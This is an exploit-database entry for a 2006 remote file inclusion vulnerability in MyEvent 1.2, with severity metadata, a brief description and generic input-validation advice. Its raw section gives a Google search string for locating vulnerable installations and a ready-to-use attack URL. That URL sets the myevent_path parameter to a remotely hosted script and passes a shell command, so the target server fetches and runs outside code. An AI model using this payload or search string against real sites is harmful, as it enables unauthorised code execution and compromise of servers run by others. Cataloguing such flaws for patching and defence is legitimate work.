header-logo
Suggest Exploit
vendor:
MyEvent
by:
b3g0k,Nistiman,flot,Netqurd etc.
7,5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: MyEvent
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: None
CPE: a:myevent:myevent:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

MyEvent

A vulnerability in MyEvent 1.2 allows remote attackers to execute arbitrary code via a crafted myevent_path parameter in an event.php request. The vulnerability is due to insufficient sanitization of user-supplied input, which allows attackers to inject malicious code into the application. This code is then executed on the server.

Mitigation:

Input validation should be used to prevent code injection attacks. All input data should be validated and filtered, and special characters should be removed or escaped.
Source

Exploit-DB raw data:

Script : MyEvent
Version : 1.2
Risk : High
Class : Remote
Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php" 

http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a 

# milw0rm.com [2006-04-17]